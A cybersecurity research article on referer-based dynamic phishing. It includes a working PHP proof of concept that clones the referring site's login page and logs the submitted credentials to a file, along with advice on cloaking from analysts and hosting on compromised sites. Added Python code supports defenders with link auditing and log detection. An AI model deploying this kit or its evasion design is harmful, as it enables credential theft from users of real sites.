Auto-generated phishing pages and the social web.
(The following is a cybersecurity research article on credential theft using non-traditional and underexploited phishing methods.)
You’re browsing the web and logged into an online discussion space such as YouTube, Reddit, Twitter, Medium or a small community forum. You click a link posted by another user that appears to lead to another page on the same site. Instead of the content you were looking for, you’re presented with the login page of the site you’re already on. Annoyed and a little confused as to why you’ve been logged out, you log back in and are taken to the content you were expecting.
You’ve just been phished.
Creating phishing pages based on the HTTP Referer header
When we hear “phishing attack” we usually think of email. We don’t usually think of web-based attacks delivered through online discussion sites; usually, these would be easy to spot and block. The novelty of this attack is in using the HTTP Referer header to customise the phishing page when the victim lands on it, so that it looks like a bug in the usual user experience. After all, how many times have you been browsing a site and then been randomly asked to log back in again?
How dynamic phishing pages work
- Submit a phishing link to an online discussion space where users are likely to be logged in already.
  - The link text looks like it points to another location on the same site, but it actually points to the dynamic phishing page engine.
- The victim clicks the link, expecting another post on the site.
  - This could be another video, tweet, image, blog post, comment, etc.
- The victim’s browser requests the dynamic phishing page from the engine.
  - The request carries the HTTP Referer header, which names the site the user was on previously.
- The dynaphish engine examines the Referer header and retrieves the login page for that site.
  - It does this by requesting common login paths on the referring site, such as /login, /admin, /user or /sign-up?type=login.
- The dynaphish engine renders a login page identical to that of the referring site, except for the POST target of the login form.
  - This includes any dynamic content already on the site, such as current news, headlines, top posts, tweets, etc.
- The user ‘logs in’ and is redirected back to the expected content in their existing session.
  - Because they already have a session open, everything appears to have worked: they get the content they were looking for and are unaware that anything unusual has happened.
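The first two steps depend on the discussion site rendering a user-submitted link whose text looks on-site while its href leaves the site, and on the browser sending a Referer header when it is clicked. The following is an added example, not code from the article, of a link audit the discussion site could run over posted HTML: it flags such lookalike links and returns the rel value (noreferrer) that stops the Referer header from ever reaching the engine. The hostname forum.example and the sample post are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "forum.example"  # assumed hostname of the discussion site
class LinkCollector(HTMLParser):
    """Collect every <a> tag with its href and visible text."""
    def __init__(self):
        super().__init__()
        self.links, self._current = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = {"href": dict(attrs).get("href") or "", "text": ""}
    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data
    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append(self._current)
            self._current = None

def host_of(value):
    """Hostname of a URL or of bare text such as 'forum.example/t/123'."""
    value = value.strip()
    if "://" not in value:
        value = "http://" + value
    try:
        return (urlparse(value).hostname or "").lower()
    except ValueError:
        return ""

def audit_links(html, site_host=SITE_HOST):
    """Off-site links get rel=noreferrer so no Referer header reaches the engine;
    a link whose text names our host but whose href points elsewhere is a lookalike."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for link in collector.links:
        text = link["text"].strip()
        href_host = host_of(link["href"])
        text_host = host_of(text) if ("/" in text or "." in text) else ""
        off_site = bool(href_host) and href_host != site_host
        findings.append({"href": link["href"], "text": text, "off_site": off_site,
                         "lookalike": off_site and text_host == site_host,
                         "rel": "noopener noreferrer" if off_site else ""})
    return findings

# Constructed sample post: a genuine link, a lookalike and an honest off-site link.
SAMPLE_POST = ('<p>See <a href="https://forum.example/t/123">forum.example/t/123</a>, '
               '<a href="http://dynaphish.invalid/">forum.example/t/456</a> and '
               '<a href="https://docs.python.org/">the docs</a></p>')
```

Lookalike findings are worth rejecting or rewriting at post time; the rel value belongs on every off-site anchor the site renders, since the engine only needs the origin part of the Referer.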
What this needs in order to work
Now, not everything is that simple. This attack relies on a few things:
- The users trust the site they’re already on. The phishing page pulls enough recent content from the target site to look believable without close inspection. We train our users to check for padlocks, green bars, SSL certificates, correct domain names, etc. when they arrive from emails, but we generally don’t do this as meticulously when deep into a browsing session on one site.
- The dynaphish engine can differentiate actual users from bots and site admins. As it inspects the headers of each web request before rendering content, it can hide its intent from unwanted user agents, IP addresses, referers and devices.
- The domain can’t be on a known bad-actor list. Rendering the phishing page content dynamically makes it more difficult for analysis tools to identify the page as malicious before execution time, at which point it may be too late.
Dynamic referer phishing pages – A Proof of Concept
Here’s a very basic proof of concept possible with just two PHP files. The first is the landing page, which downloads and presents the content of the referring website’s login page. The second is a credential capture and user forwarding page.
```php
<?php
// index.php - landing page: fetches the referring site's login page and
// rewrites every form so that it posts to login.php instead.
if (isset($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
    $stripped = stripUrlPath($referer);   // scheme://host of the referring site
    $url = $stripped . "/login";          // one of the common login paths
    $loginpage = file_get_contents($url);
    $dom = new DOMDocument();
    $dom->loadHTML($loginpage);
    foreach ($dom->getElementsByTagName('form') as $form) {
        $form->setAttribute('action', 'login.php?target=' . $referer);
    }
    print $dom->saveHTML();
} else {
    print "error";
}

// Returns scheme://host with no trailing slash, so appending "/login"
// yields a single slash.
function stripUrlPath($url) {
    $urlParts = parse_url($url);
    return $urlParts['scheme'] . "://" . $urlParts['host'];
}
?>
```

```php
<?php
// login.php - credential capture: appends the submitted request to a log file,
// then forwards the user back to the page they expected to see.
$req_dump = print_r($_REQUEST, true);
$fp = fopen('request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
header('Location: ' . $_GET['target']);
?>
```
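From the target site's side, the engine's fetch of the login page is visible in the access log: a server-side fetch like the one above typically sends no User-Agent at all (logged as "-"), and the article describes the engine trying several candidate login paths. The following is an added detection example, not part of the article: it parses combined-format access log lines (constructed here) and flags clients that probe several of those paths with a non-browser User-Agent inside a short window.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache/nginx "combined" format, assumed for the target site's access log.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Login-page candidates the engine is described as probing.
LOGIN_PATHS = {"/login", "/admin", "/user", "/sign-up"}
WINDOW_SECONDS = 60

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop ?type=login etc.
    return rec

def looks_like_browser(ua):
    """PHP's file_get_contents sends no User-Agent by default, logged as "-"."""
    return ua not in ("", "-") and ua.startswith("Mozilla/")

def find_login_scrapers(lines, min_paths=2):
    """Return {ip: [paths]} for clients that hit several login candidates
    with a non-browser User-Agent within WINDOW_SECONDS of their first hit."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] in LOGIN_PATHS and not looks_like_browser(rec["ua"]):
            hits[rec["ip"]].append((rec["ts"], rec["path"]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        first = events[0][0]
        paths = {p for t, p in events if (t - first).total_seconds() <= WINDOW_SECONDS}
        if len(paths) >= min_paths:
            flagged[ip] = sorted(paths)
    return flagged

# Constructed log lines: a scraper probing three paths, a real login, one lone curl hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /login HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /admin HTTP/1.1" 404 512 "-" "-"',
    '203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /user HTTP/1.1" 200 8192 "-" "-"',
    '198.51.100.9 - - [10/Mar/2024:12:00:05 +0000] "GET /login HTTP/1.1" 200 8192 '
    '"https://forum.example/t/123" "Mozilla/5.0 (X11; Linux x86_64) Firefox/123.0"',
    '192.0.2.44 - - [10/Mar/2024:12:30:00 +0000] "GET /sign-up?type=login HTTP/1.1" 200 8192 "-" "curl/8.5.0"',
]
```

A matching engine can of course set a browser-like User-Agent, so pair this with the referer of the victim's subsequent real login, which will name the engine's domain rather than the discussion site.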
Why this works
Creating the phishing page dynamically makes it easier to evade detection, easier to gain users’ trust by presenting an expected screen that is identical to the real thing, and easier to deploy, since any compromised website can host a landing page for any other site.
Using a dynamic redirection mechanism that behaves like any URL shortener, it is possible to load-balance across thousands of compromised websites through a few routing domains, adding a level of resilience to the design.
odiraa says
Please, I would like to learn how to build this on my own. This is just for educational purposes because I am in love with IT, but I am just not so lucky to have someone around to put me through.